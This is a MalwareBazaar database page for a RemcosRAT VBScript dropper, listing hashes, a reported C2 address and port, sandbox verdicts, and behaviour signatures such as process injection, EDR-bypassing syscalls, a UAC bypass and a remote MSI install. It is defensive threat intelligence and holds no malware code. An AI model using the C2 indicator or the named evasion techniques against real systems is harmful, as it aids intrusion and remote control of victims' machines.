MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


RemcosRAT


Vendor detections: 8


Intelligence 8 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
SHA3-384 hash: c6c114853014e7f5ca9a7f1d0fb3945f587b5d29507597edce1177493e00fb16611c057edaacd2995432546322fb888e
SHA1 hash: 2c0f959b61081a10a085ad8e8f8741a69e2d9934
MD5 hash: 183d51767fe58e2bd256688315d25709
humanhash: texas-virginia-maine-juliet
File name:secondaryTask.vbs
Download: download sample
Signature RemcosRAT
Create hunting rule
File size:876 bytes
First seen:2024-11-30 00:23:16 UTC
Last seen:Never
File type:Visual Basic Script (vbs) vbs
MIME type:text/plain
ssdeep 24:PAilGdehX66xyIpDkJbJ4CQjamgX3TX83qpz/7:P9GaZpDkNSKZzD
Threatray 4'629 similar samples on MalwareBazaar
TLSH T16B116F4D8EBE8673EDB403F255FF31848BCC640180A9541F25A7A8342681C0587676DF
Magika vba
Reporter aachum
Tags:RemcosRAT vbs


Avatar
iamaachum
Remcos C2: 185.157.162.126:1995

Intelligence

File Origin
# of uploads :
1
# of downloads :
130
Origin country :
ES ES
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Script.SNH-gen.2447.18981.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
96.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=674a5c6ee64d1c722d7a4685
Tags:
remcos virus gates overt
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
cmd evasive lolbin msiexec remote
Link:
https://www.filescan.io/uploads/674a5b222369b8c7bbfe2d79/reports/8086458d-b307-4e57-9cec-50109178202b/overview
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
Result
Threat name:
Clipboard Hijacker, MicroClip, Remcos
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1565487
Signature
AI detected suspicious sample
Allocates memory in foreign processes
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Injects a PE file into a foreign processes
Installs a MSI (Microsoft Installer) remotely
Machine Learning detection for dropped file
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Multi AV Scanner detection for dropped file
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
VBScript performs obfuscated calls to suspicious functions
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Clipboard Hijacker
Yara detected MicroClip
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565487 Sample: secondaryTask.vbs Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 69 185.157.162.126 OBE-EUROPEObenetworkEuropeSE Sweden 2->69 71 shed.dual-low.s-part-0035.t-0009.t-msedge.net 2->71 73 6 other IPs or domains 2->73 79 Found malware configuration 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 Antivirus detection for dropped file 2->83 85 10 other signatures 2->85 9 msiexec.exe 23 48 2->9         started        13 RaftelibeGasrss.exe 11 2->13         started        16 EHttpSrv.exe 1 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 75 github.com 20.233.83.145, 443, 49707 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 9->75 77 raw.githubusercontent.com 185.199.108.133, 443, 49709 FASTLYUS Netherlands 9->77 61 C:\Windows\Installer\MSI3C7A.tmp, PE32 9->61 dropped 63 C:\Windows\Installer\MSI3C5A.tmp, PE32 9->63 dropped 65 C:\Windows\Installer\MSI3C2A.tmp, PE32 9->65 dropped 67 6 other files (4 malicious) 9->67 dropped 20 Updwork.exe 18 9->20         started        24 EHttpSrv.exe 1 9->24         started        26 msiexec.exe 9->26         started        107 Writes to foreign memory regions 13->107 109 Allocates memory in foreign processes 13->109 111 Tries to detect virtualization through RDTSC time measurements 13->111 121 3 other signatures 13->121 28 WerFault.exe 13->28         started        113 Maps a DLL or memory area into another process 16->113 30 cmd.exe 2 16->30         started        115 VBScript performs obfuscated calls to suspicious functions 18->115 117 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->117 119 Installs a MSI (Microsoft Installer) remotely 18->119 32 cmd.exe 4 18->32         started        34 cmd.exe 1 18->34         started        36 msiexec.exe 18->36         started        file6 signatures7 process8 file9 55 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 20->55 dropped 87 Antivirus detection for dropped file 20->87 89 Multi AV Scanner detection for dropped file 20->89 91 Writes to foreign memory regions 20->91 99 4 other signatures 20->99 38 WerFault.exe 20->38         started        93 Found API chain indicative of debugger detection 24->93 95 Maps a DLL or memory area into another process 24->95 97 Switches to a custom stack to bypass stack traces 24->97 40 cmd.exe 1 24->40         started        57 C:\Users\user\AppData\Local\Temp\dsx, PE32 30->57 dropped 43 EHttpSrv.exe 30->43         started        45 conhost.exe 30->45         started        59 C:\Users\user\AppData\Local\...\yljutqdulam, PE32 32->59 dropped 47 EHttpSrv.exe 32->47         started        49 conhost.exe 32->49         started        51 conhost.exe 34->51         started        signatures10 process11 signatures12 101 Found hidden mapped module (file has been removed from disk) 40->101 103 Switches to a custom stack to bypass stack traces 40->103 53 conhost.exe 40->53         started        105 Found direct / indirect Syscall (likely to bypass EDR) 43->105 process13
Score:
0%
Verdict:
Benign
File Type:
SCRIPT
Link:
https://malprob.io/report/23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0/
Threat name:
Script-WScript.Backdoor.Remcos
Create hunting rule
Status:
Suspicious
First seen:
2024-11-29 07:01:01 UTC
File Type:
Text (VBS)
AV detection:
5 of 24 (20.83%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=enzd7g2chemuuin7bx2vt6pj36foye4zrgjummi4bhg43enj6gya._file
Verdict:
malicious
Label(s):
remcos
Create hunting rule
Similar samples:
6ed0c218b751ec93293b5922e783b7a9b147a3c7cd6070022cd707050108d321
RemcosRAT
b2a1e0e508be9c7546a8af45c72f2032f067ac036f03ec0c8309b368b195a65c
RemcosRAT
e375d127ede7c4f45893d14e94e334672688b4861a5e2dfe54deda05a67b6727
RemcosRAT
e483ca3bc78e49f0ceef3406ea963101fe1d2b08b4bace6945ac9298222b8c37
RemcosRAT
error
RemcosRAT
f57e0e55aa4691d0502f6da67d4ecb2823c98bd319c5208ae44a518a0a17392b
RemcosRAT
f5dfa6b5d19d9334c69d24dd98f13cb30badacb6403b03afc47af4e267cbe0c2
RemcosRAT
fc7beeae6b795561f216733b82611c8db1643cc883ded6fbca9c447c7a985358
RemcosRAT
+ 4'619 additional samples on MalwareBazaar
Result
Malware family:
remcos
Create hunting rule
Score:
  10/10
Tags:
family:hijackloader family:remcos botnet:v2 discovery loader rat
Link:
https://tria.ge/reports/241130-ap2yvatqat/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
NSIS installer
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Windows directory
Suspicious use of SetThreadContext
Blocklisted process makes network request
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Use of msiexec (install) with remote resource
Detects HijackLoader (aka IDAT Loader)
HijackLoader
Hijackloader family
Remcos
Remcos family
Malware Config
C2 Extraction:
185.157.162.126:1995
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Suspicious File
Score:
0.38
Link:
https://yomi.yoroi.company/submissions/23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

RemcosRAT

Microsoft Software Installer (MSI) msi bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449

RemcosRAT

Visual Basic Script (vbs) vbs 23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0

(this sample)

RemcosRAT

Microsoft Software Installer (MSI) msi 6ed0c218b751ec93293b5922e783b7a9b147a3c7cd6070022cd707050108d321

  
Link
https://tria.ge/241130-aljcbsylbj/
  
Dropping
SHA256 6ed0c218b751ec93293b5922e783b7a9b147a3c7cd6070022cd707050108d321
  
Dropped by
SHA256 bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449
  
Delivery method
Other
  
Dropped by
MD5 028578212baa7456aae40d4bdb5792e5

Comments